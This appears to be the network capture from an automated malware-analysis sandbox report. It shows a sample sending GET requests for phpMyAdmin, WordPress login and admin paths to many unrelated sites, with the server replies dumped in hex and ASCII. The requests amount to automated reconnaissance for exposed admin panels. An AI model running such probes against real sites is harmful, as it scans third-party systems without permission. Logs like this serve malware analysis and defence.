                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx/1.12.2</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                381192.168.2.66296331.13.65.180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.098143101 CET179OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: hi-in.facebook.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.201415062 CET213INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Location: https://hi-in.facebook.com/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                Server: proxygen-bolt
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                382192.168.2.662845185.51.191.4880
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.112692118 CET180OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: innovationdevelopment.eu
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.379292965 CET239INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:06 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache
                                                                                                                                                                                                                                                                                                                                                                Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                Location: http://innovationdevelopment.eu/admin/w
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.385289907 CET5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                383192.168.2.662964104.18.32.10980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.116134882 CET176OUTGET /admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: sport.autoplay.cloud
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.259362936 CET608INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                                                                                                Expires: Mon, 05 Feb 2024 12:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://sport.autoplay.cloud/admin/
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: __cf_bm=YOyxb9aU78NaI96z2sr4QbRuq80T5iBgvIchIzUA8sc-1707131767-1-AeL6bfGfUZ6U/Ap1Ak+vwqFlIGc33k6j5+9DW+6potT7/e/iNxD6laTBd7Qn7PszDDObqSeT9QEqBj5vyiFCIYY=; path=/; expires=Mon, 05-Feb-24 11:46:07 GMT; domain=.autoplay.cloud; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                                                                                                CF-RAY: 850abd48cabab0eb-ATL
                                                                                                                                                                                                                                                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                384192.168.2.662954138.197.59.19980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.116137981 CET184OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: api.cmrsanmartin.ziz.cl
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.237778902 CET564INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.41 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Location: https://api.cmrsanmartin.ziz.cl/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 340
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 70 69 2e 63 6d 72 73 61 6e 6d 61 72 74 69 6e 2e 7a 69 7a 2e 63 6c 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://api.cmrsanmartin.ziz.cl/phpMyAdmin/">here</a>.</p><hr><address>Apache/2.4.41 (Ubuntu) Server at api.cmrsanmartin.ziz.cl Port 80</address></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                385192.168.2.6629553.134.125.17580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.117799997 CET190OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: 3fba-180-252-166-236.ngrok.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.242573977 CET328INHTTP/1.1 307 Temporary Redirect
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Location: https://3fba-180-252-166-236.ngrok.io/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Ngrok-Trace-Id: 7c1ca6c8e035d86bf45e17d87f787cea
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 85
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 33 66 62 61 2d 31 38 30 2d 32 35 32 2d 31 36 36 2d 32 33 36 2e 6e 67 72 6f 6b 2e 69 6f 2f 70 68 70 4d 79 41 64 6d 69 6e 2f 22 3e 54 65 6d 70 6f 72 61 72 79 20 52 65 64 69 72 65 63 74 3c 2f 61 3e 2e 0a 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <a href="https://3fba-180-252-166-236.ngrok.io/phpMyAdmin/">Temporary Redirect</a>.


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                386192.168.2.6629773.161.150.6980
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.117844105 CET180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: account.booking.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.221394062 CET580INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Server: CloudFront
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 167
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Location: https://account.booking.com/phpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                X-Cache: Redirect from cloudfront
                                                                                                                                                                                                                                                                                                                                                                Via: 1.1 3e445414cb8134bf4b609fdcfe022fcc.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Pop: ATL59-P5
                                                                                                                                                                                                                                                                                                                                                                X-Amz-Cf-Id: DDxbFguVMoQVA0kq9vcc7-DDtP_b8q3f6_KzEOjNvQ3GNJ5z4T9jzQ==
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 43 6c 6f 75 64 46 72 6f 6e 74 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>CloudFront</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                387192.168.2.66293354.183.63.24180
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.118530989 CET179OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: pt.secure.imvu.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.300959110 CET1286INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.17.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/8.2.4
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; HttpOnly
                                                                                                                                                                                                                                                                                                                                                                Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Set-Cookie: osCsid=6ad362c97b4f2eb28aeb4b8d23703fe9; expires=Mon, 04 Mar 2024 11:16:07 GMT; Max-Age=2419200; path=/; domain=.imvu.com; secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                                                                                                                                x-imvu-rnd: dRlEpjkJUklYfdQGFcNjovzP
                                                                                                                                                                                                                                                                                                                                                                content-language: pt-br
                                                                                                                                                                                                                                                                                                                                                                Content-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 31 32 34 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 3b db 6e db 48 96 ef 06 e6 1f aa 99 ee 96 d4 23 8a d4 c5 b2 24 db 1a c8 97 74 b2 93 38 d9 38 c9 f4 20 1b 18 45 b2 28 d1 21 59 0c ab 68 4b ed c9 c7 0c f6 61 30 0b ec d3 60 5f f6 d5 3f b6 e7 14 49 89 94 a8 c4 e9 56 37 d6 84 ac 72 5d ce fd 56 c5 f2 d1 37 67 2f 4e 5f ff f5 e5 39 99 c9 c0 1f 1f 7d a3 eb ef 3c 97 3c 3d 27 83 f7 63 92 ff 1c e1 20 71 bc f8 58 f3 65 ac 11 9f 86 d3 63 8d 85 fa 9b 4b 8d d8 3e 15 e2 58 f3 d8 40 1b 93 a3 6f de b1 d0 f1 dc f7 ba 5e 04 36 fc 6a 60 c3 2d c0 a6 32 83 87 1d e3 6a 58 91 d4 ad 58 ad d7 f5 22 8c bd a3 19 a3 ce 78 4f 51 11 30 49 81 69 19 e9 ec 63 e2 dd 1c 6b 3f e9 6f 26 fa 29 0f 22 2a 3d cb 67 40 0b 0f 25 0b e5 b1 f6 f4 fc 98 39 53 e8 31 b6 ad 3d 4d a7 ea af 17 51 71 a1 64 73 69 20 89 87 c4 9e d1 58 30 79 fc e6 f5 63 7d b0 06 29 a4 01 3b d6 68 14 f9 4c f7 64 12 32 a1 c3 1f 05 38 f0 97 ee 39 c7 c3 f6 f0 a0 b7 3f e8 f5 9a 04 7b 68 3c 4d 02 1c 47 4a c4 c8 30 22 d9 12 cc 4e 62 d6 f2 82 9b a4 65 f3 c0 08 91 82 3f 09 9e c4 36 3b b6 68 18 b2 58 21 2f 22 9e 72 3e 05 cc 91 4f 17 d5 78 01 50 0a 31 e0 96 e7 33 9b c7 0e bf a1 1b 70 52 06 d2 39 fa 2d b3 10 98 6e d3 88 96 a5 b9 60 e2 61 4b 85 a4 32 11 ba 45 63 68 2e 4a 30 2c 9f da 1f 74 19 d3 50 f8 89 0d 5d ff 0f 89 f1 bd f0 03 89 99 9f 03 94 3c b1 67 ba 07 cb 34 22 bc 9f 19 98 f9 fe c1 7c ff 40 23 b3 98 b9 c7 1a 6a 11 94 b8 ae 41 f8 04 3c 34 6e 3d 39 0b 98 e1 05 53 c3 a5 37 08 c5 58 07 ab 2b 70 ad 28 9c 3e 98 80 be 39 ef 9b bb 23 40 81 fb 2a 02 0e 3a f3 83 ce ee 08 50 e0 be 8e 80 fe fc a0 bf 43 02 10 dc 57 11 d0 6e f7 e6 f0 d9 1d
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 1242;nH#$t88 E(!YhKa0`_?IV7r]V7g/N_9}<<='c qXecK>X@o^6j`-2jXX"xOQ0Iick?o&)"*=g@%9S1=MQqdsi X0yc});hLd289?{h<MGJ0"Nbe?6;hX!/"r>OxP13pR9-n`aK2Ech.J0,tP]<g4"|@#jA<4n=9S7X+p(>9#@*:PCWn
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.300982952 CET1286INData Raw: 09 19 c0 af 23 a2 63 ce e1 b3 43 22 52 80 5f 47 44 0f 08 ef ed 52 12 29 c0 af 23 62 bf 33 87 cf 0e 89 48 01 7e 1d 11 03 90 de 60 97 ea 48 01 56 11 91 22 96 90 b8 a0 1d d0 29 33 d4 a4 5f 88 39 fb d6 bb 9d 79 37 e3 39 e3 49 f5 fc 3e c8 db 43 d0 fb
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: #cC"R_GDR)#b3H~`HV")3_9y79I>CWB>a^ist{5!Iy,<2!1@Z ebci'<:Z+EJW-x$N;t{p3WF\xZd=2%F-(X[\JL!
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.301000118 CET1286INData Raw: 39 f9 d2 bb 53 6f 07 cd 9b a8 7d 70 dd a6 0b bb e1 7a 06 a0 d1 94 bc fe a8 3b 9c 0c 4f 4e 1a 5f b5 1d 49 d7 37 f3 b5 eb e1 7f 5b 25 fa 40 a7 da 1e b0 ab a6 6d 04 6e e0 f6 81 b0 95 3a 1e 86 20 d5 5c d1 35 3b 93 d3 83 f3 76 19 d3 2d 6c b5 f8 ad 58
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 9So}pz;ON_I7[%@mn: \5;v-lXakGfqd{gCzqc3{%(\pI#F2"O}sd/{$vYCu/>L:6]fc[a%8Z/l]m+tOV}#DD]@A
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.301018000 CET1286INData Raw: 96 3f 64 eb a2 18 52 46 2c 17 c7 1a 9f 8e 60 57 4b fd f2 f4 ab e5 74 23 bd 85 76 84 1c e5 17 de 60 23 70 eb a4 d7 b4 88 da 5f 41 1d 36 d5 23 a9 c1 3c c7 bb c9 a7 c5 6c aa af b6 64 b0 4f c0 1a ed 58 d3 b2 db 64 6b 33 d3 bd 36 73 b4 c2 de 09 a7 78
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ?dRF,`WKt#v`#p_A6#<ldOXdk36sxS@/B^I/@:km\2Aoa1Y=hw^F6^tmCz: T P6pb8fWQB"1NN".C`S<K
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.301038980 CET305INData Raw: 30 f8 22 0b 27 f0 f7 2e 8c 7e 4d 36 ea 0e a7 2d d1 e2 55 83 e9 e1 ae ad 4e 61 34 30 ed 5c 3d c7 17 26 7f f6 e4 55 c7 c4 7f f3 70 5c 6d 3c 09 13 28 20 76 1c d3 af b9 85 91 ea 1c 9d 78 ba 9b 98 5b f2 a3 42 81 27 a8 cb e4 02 36 c7 91 30 db 69 89 77
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: 0"'.~M6-UNa40\=&Up\m<( vx[B'60iw` X7Tjl\']B!-{=lbL|1/X|M[Vyn}~^M>X2n[A~ZXU/LX/?OZ=`A$ixv5eb'doq


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                388192.168.2.66293244.233.131.11580
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.134409904 CET174OUTGET /pma/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: cloud.simplify3d.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.306911945 CET379INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Location: https://cloud.simplify3d.com/pma/
                                                                                                                                                                                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 178
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body bgcolor="white"><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                389192.168.2.66296764.91.249.2080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.139781952 CET174OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: chainmine.io
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.285948038 CET357INHTTP/1.1 302 Moved Temporarily
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/5.4.16
                                                                                                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                Location: http://ww7.chainmine.io/wp-login.php?usid=27&utid=4923817197
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                390192.168.2.66299834.149.46.13080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.144015074 CET182OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: accounts.snapchat.com
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.248286963 CET211INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: private
                                                                                                                                                                                                                                                                                                                                                                Location: https://accounts.snapchat.com:443/PhpMyAdmin/
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                391192.168.2.662971103.224.182.21080
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.151710033 CET228OUTGET /wp-admin/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: followerstiktok.xyz
                                                                                                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                                                                                                Accept-Encoding: deflate, gzip
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                                                                                                                                                                                Referer: http://followerstiktok.xyz/wp-login.php
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:16:07.307220936 CET346INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                                                                                                date: Mon, 05 Feb 2024 11:16:07 GMT
                                                                                                                                                                                                                                                                                                                                                                server: Apache
                                                                                                                                                                                                                                                                                                                                                                set-cookie: __tad=1707131767.6447963; expires=Thu, 02-Feb-2034 11:16:07 GMT; Max-Age=315360000
                                                                                                                                                                                                                                                                                                                                                                location: http://ww16.followerstiktok.xyz/wp-admin/?sub1=20240205-2216-072b-880c-130055c7e3e5
                                                                                                                                                                                                                                                                                                                                                                content-length: 2
                                                                                                                                                                                                                                                                                                                                                                content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                connection: close
